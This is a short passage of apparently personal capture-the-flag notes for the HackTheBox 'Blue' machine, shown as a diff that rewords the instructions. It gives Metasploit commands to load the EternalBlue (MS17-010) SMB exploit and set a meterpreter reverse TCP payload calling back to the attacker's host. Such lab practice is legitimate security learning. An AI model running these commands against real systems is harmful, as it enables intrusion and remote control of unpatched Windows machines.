David-Kaufman/HackTheBox/Blue/Notes.md

 ```
 use exploit/windows/smb/ms17_010_eternalblue
 ````

-Set RHOSTS to the box ip, and set the payload as meterpreter where LHOST is our ip.
+Set RHOSTS to the box ip.
+This exploit grants a root shell so no need for meterpreter here, but just for the practice lets use it.
+Set the payload as meterpreter where LHOST is our ip.

 ```
 set payload windows/x64/meterpreter/reverse_tcp